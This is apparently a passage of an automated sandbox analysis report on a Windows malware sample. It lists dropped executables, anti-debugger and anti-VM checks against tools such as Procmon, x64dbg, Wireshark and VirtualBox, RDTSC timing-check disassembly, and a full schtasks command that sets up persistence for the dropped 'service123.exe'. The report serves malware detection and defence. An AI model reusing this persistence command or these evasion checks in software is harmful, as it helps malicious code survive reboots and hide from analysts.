Source: 95e1Fwp61u.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 95e1Fwp61u.exe Static PE information: Raw size of wfipzyes is bigger than: 0x100000 < 0x1c5c00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B48230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00B48230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 95e1Fwp61u.exe Static PE information: real checksum: 0x454cda should be: 0x45a0f8
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: 95e1Fwp61u.exe Static PE information: section name: .idata
Source: 95e1Fwp61u.exe Static PE information: section name:
Source: 95e1Fwp61u.exe Static PE information: section name: wfipzyes
Source: 95e1Fwp61u.exe Static PE information: section name: apfxvsxz
Source: 95e1Fwp61u.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00B4A521 push es; iretd 8_2_00B4A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C180C30 push eax; mov dword ptr [esp], edi 8_2_6C180DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14ED10 push eax; mov dword ptr [esp], ebx 8_2_6C14EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C124E31 push eax; mov dword ptr [esp], ebx 8_2_6C124E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118E7A push edx; mov dword ptr [esp], ebx 8_2_6C118E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A947 push eax; mov dword ptr [esp], ebx 8_2_6C11A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14EAB0 push eax; mov dword ptr [esp], ebx 8_2_6C14EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AA2 push eax; mov dword ptr [esp], ebx 8_2_6C120AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138AA0 push eax; mov dword ptr [esp], ebx 8_2_6C13909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C122AAC push edx; mov dword ptr [esp], ebx 8_2_6C122AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push eax; mov dword ptr [esp], ebx 8_2_6C152F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push edx; mov dword ptr [esp], ebx 8_2_6C152F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118435 push edx; mov dword ptr [esp], ebx 8_2_6C118449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138460 push eax; mov dword ptr [esp], ebx 8_2_6C138A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11048B push eax; mov dword ptr [esp], ebx 8_2_6C1104A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1104E0 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A5A7 push eax; mov dword ptr [esp], ebx 8_2_6C11A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push eax; mov dword ptr [esp], ebx 8_2_6C152954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push edx; mov dword ptr [esp], ebx 8_2_6C152973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1606B0 push eax; mov dword ptr [esp], ebx 8_2_6C160A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A2 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1286A1 push 890005EAh; ret 8_2_6C1286A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A6 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1166F3 push edx; mov dword ptr [esp], ebx 8_2_6C116707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106FD push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11070E push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A777 push eax; mov dword ptr [esp], ebx 8_2_6C11A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120042 push eax; mov dword ptr [esp], ebx 8_2_6C120056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0EE0D0 push eax; mov dword ptr [esp], ebx 8_2_6C1A6AF6
Source: 95e1Fwp61u.exe Static PE information: section name: wfipzyes entropy: 7.956035978180135
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\95e1Fwp61u.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F5AB second address: 159F5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F5B1 second address: 159F5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F5B5 second address: 159F5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F5B9 second address: 159F5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F757 second address: 159F75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F75F second address: 159F782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F19CCBA87BEh 0x0000000d jmp 00007F19CCBA87BDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F782 second address: 159F79B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Fh 0x00000009 jbe 00007F19CD112F66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F79B second address: 159F79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F8F6 second address: 159F900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F19CD112F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159F900 second address: 159F904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159FA54 second address: 159FA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F70h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007F19CD112F6Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159FA77 second address: 159FA7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159FA7E second address: 159FA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007F19CD112F6Ch 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jg 00007F19CD112F66h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159FA9F second address: 159FAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F19CCBA87C2h 0x0000000b jg 00007F19CCBA87B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 159FD64 second address: 159FD69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1EA0 second address: 15A1EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1F27 second address: 15A1F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F19CD112F79h 0x0000000e nop 0x0000000f sbb dl, 00000019h 0x00000012 push 00000000h 0x00000014 xor dword ptr [ebp+122D28C5h], eax 0x0000001a call 00007F19CD112F69h 0x0000001f jg 00007F19CD112F6Eh 0x00000025 push eax 0x00000026 push ecx 0x00000027 push edx 0x00000028 jc 00007F19CD112F66h 0x0000002e pop edx 0x0000002f pop ecx 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1F80 second address: 15A1F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1F8A second address: 15A1F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1F8E second address: 15A1F9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F19CCBA87B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1F9F second address: 15A1FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F19CD112F66h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1FB4 second address: 15A1FFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a mov dword ptr [ebp+122D1BA7h], ecx 0x00000010 popad 0x00000011 pop esi 0x00000012 push 00000003h 0x00000014 jno 00007F19CCBA87BAh 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D187Bh] 0x00000022 push 00000003h 0x00000024 movzx edi, bx 0x00000027 push C01EDEFEh 0x0000002c push edi 0x0000002d pushad 0x0000002e jmp 00007F19CCBA87C5h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A1FFD second address: 15A2045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 xor dword ptr [esp], 001EDEFEh 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F19CD112F68h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 adc esi, 5D21FB9Fh 0x0000002d lea ebx, dword ptr [ebp+12455DC1h] 0x00000033 push eax 0x00000034 pop edi 0x00000035 push eax 0x00000036 pushad 0x00000037 js 00007F19CD112F6Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2045 second address: 15A204D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A20F8 second address: 15A2102 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A21C6 second address: 15A21DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F19CCBA87B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F19CCBA87B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A21DC second address: 15A21E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2247 second address: 15A2282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, dword ptr [ebp+122D3668h] 0x00000010 push 00000000h 0x00000012 jmp 00007F19CCBA87C4h 0x00000017 push C42B9294h 0x0000001c pushad 0x0000001d js 00007F19CCBA87BCh 0x00000023 jns 00007F19CCBA87B6h 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2282 second address: 15A2317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 add dword ptr [esp], 3BD46DECh 0x0000000d jbe 00007F19CD112F6Ah 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F19CD112F68h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1A20h], esi 0x00000035 push 00000000h 0x00000037 cmc 0x00000038 mov dword ptr [ebp+122D18E9h], edi 0x0000003e push 00000003h 0x00000040 call 00007F19CD112F6Bh 0x00000045 mov esi, dword ptr [ebp+122D1DF7h] 0x0000004b pop esi 0x0000004c push 8A50FB00h 0x00000051 je 00007F19CD112F6Eh 0x00000057 jc 00007F19CD112F68h 0x0000005d add dword ptr [esp], 35AF0500h 0x00000064 mov dword ptr [ebp+122D1DF7h], esi 0x0000006a lea ebx, dword ptr [ebp+12455DD5h] 0x00000070 push ebx 0x00000071 mov ecx, 0316ABB1h 0x00000076 pop esi 0x00000077 xchg eax, ebx 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c je 00007F19CD112F66h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2317 second address: 15A231B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A231B second address: 15A2321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2321 second address: 15A232B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A232B second address: 15A232F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A232F second address: 15A2342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F19CCBA87B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2342 second address: 15A2348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15A2348 second address: 15A2352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C4251 second address: 15C426A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F19CD112F70h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2229 second address: 15C222D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C23C5 second address: 15C23F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F19CD112F66h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F19CD112F73h 0x00000015 jns 00007F19CD112F6Ah 0x0000001b rdtsc
